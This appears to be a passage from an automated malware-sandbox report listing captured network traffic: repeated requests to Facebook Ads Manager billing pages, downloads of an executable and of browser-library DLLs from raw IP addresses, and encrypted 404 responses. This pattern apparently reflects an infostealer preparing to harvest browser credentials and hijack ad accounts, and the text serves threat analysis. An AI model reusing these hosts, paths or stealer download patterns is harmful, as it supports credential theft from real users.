Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /llpb1133.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.73.134.27
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: 1235125521512Host: 62.204.41.134Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70Host: iueg.aappatey.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Gnse3G6QHxmrV1%2FSGGhyhlKBQirQCs8SBnoP8Hqt97J01hgXqEr%2FqdRRF7r15GGDPwnzz4pR73p5RnDH84zEShW5P5OuBq%2F2jo2VmbW1%2FMakUdtmpss7tZgcXl7azYew"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e475f6a0435fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 0d 0a 03 00 00 00 1f 3d 52 0d 0a Data Ascii: 7=R
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F8cFb1Ag5qBQY9lRkQWi5K6Cftpb5LXeW7agILbLK5pNqx7gDOXr8DOwb64RgOO%2F%2B%2Fo%2FJYjWJnjv27o%2FYya3LMbI87MdmnyHGue7OCClBFhd%2BBKsC8ViVQbxdTzLf9gG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47605b8535fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 6e e1 ea 54 77 7e fc 3d db 2e 07 f1 07 bd db 32 9c 2f 69 13 f0 83 36 3b 0f 9b f2 b0 2c 4d dd f2 3e 40 1e 84 c3 65 b9 85 5b 54 2b fd a4 4f bf 3f f9 58 56 be 86 1c d3 e9 c5 af 0e 1c 26 c4 35 82 fe 74 29 67 3d 8c a3 94 8b b9 2b 9a 0d 2f f7 11 bf 6c 13 d9 e6 58 b6 8b 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cc 00 18 46 b9 74 d7 07 53 53 fa cb 1f 9e fd 09 50 2a ee 8c 8a 7b 7e df f7 ff 78 31 53 db c4 0d 13 13 6b 5e e1 92 24 18 4f c5 03 11 cb a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 ba f2 96 be 21 51 61 02 fd 38 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 7b 5d e4 0e 98 eb 7e 71 eb 90 f0 1a 88 fa 48 d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 bb 2d b9 ee e6 cc 23 02 64 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 5b e5 cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d 13 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 99 f2 df 8e 82 11 e8 e4 1f c4 a1 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 0c 03 81 1f d4 ec 68 91 9c 99 04 f1 2c c0 ae 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 83 0a 1a 16 50 6d 43 cc bd 8b 8b e1 b2 7e d7 9c 8c c3 e0 2b e7 b7 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 ba b6 51 6f ec 8c 1c 8f 38 f5 52 48 24 3e 96 4d d1 e7 17 3f 8e e6 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6e b1 f8 af 8e 5a ff c3 a7 de aa ca d4 5f 29 46 43 9c 51 03 62 18 56 1e f8 40 aa ae 88 c1 c4 a1 33 25 7d Data Ascii: 37af`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*nTw~=.2/i6;,M>@e[T+O?XV&5t)g=+/lX3Ob>!ZC:>FtSSP*{~x1Sk^$Oa~i~]DzN,!Qa8|(kJk?a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OYfItLvwmQjgr9T8ujSYloaH72fpVPWWZn59k6bZx18UuttH4o92OEE%2Fp6EqChDtZqKHR%2BEoHWBNxrsK6z20WtVJ7QA287bvdLqiiYWpfKNvaHuYxcwaGTEQrn1RsDof"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e4763d89935fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zgAw%2BlUJztsSJARnRnHkwWF6t4U9iHjagH3QHSkLoWQoL9%2BsGIpwOqLjvmt1xuvJ%2FjFJ3iry%2FRsccu5h7eAhQ1A%2FtuUh5m3ZGNCPSxPBeQcDK2GyjGqgPRaJGtR1Jfg7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47655a9235fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 64 37 35 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 ce f5 ee 60 d7 6a f8 09 7b 3a 03 c5 a7 a9 df 06 3c 3b 7c 27 52 97 32 0f af 8f e0 84 e3 59 d9 c6 a7 c0 e2 b0 2a 71 bd b1 dc 86 55 c9 8a 5b bb 0b 47 1e d7 8a 65 08 d7 dd 65 bb 14 28 86 d0 31 b6 5e 60 28 53 9d 98 a7 a0 36 f8 37 33 ac 3b f3 25 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 a4 7d 9d 74 d7 07 53 53 fa cb 1f 9e fd 09 50 2a ee 8c 8a 7b 7e c9 f6 ff 78 bb 49 db c4 0d 13 13 d9 67 e1 92 24 18 4f c5 03 01 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 fa e8 96 be 21 51 61 d8 0b 35 7c 8a 28 c8 c9 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 7b 72 e5 0e f4 eb 7e 71 eb 10 e8 1a b8 84 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 8b 37 b9 36 e1 cc 23 e2 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 23 f6 cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d 7f 7d 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 41 e0 de 8e 82 11 e8 e4 1f d2 a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 7c fb 9e 1f d4 fc 69 91 9c 03 0f f1 2c ce af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 1c a6 8b 8b e1 f2 67 d7 9c a8 c3 e0 2b 13 be bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a2 bc 5b 6f e3 e3 1c 65 0c f5 52 48 74 27 96 4d e5 e7 17 3f 06 ef 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6c 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 Data Ascii: 7d75`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*`j{:<;|'R2Y*qU[Gee(1^`(S673;%p"XJ3Ob>!ZC:>}tSSP*{~xIg$Oa~i~]DzN,!Qa5|(kJ
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q2CqCppgNg5u4Kzx7p9ljU8Xm78OHNBFBvb%2F7GbqAQ6NigIH4oN1ra6uQsuHaukr5bFVzWTQtKVJtNGRRTk6ZBGQ%2FYFEo4opTItOfBuHGa2J0HwT3QgsMNvI6NOeSaSo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e476fd9f635fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 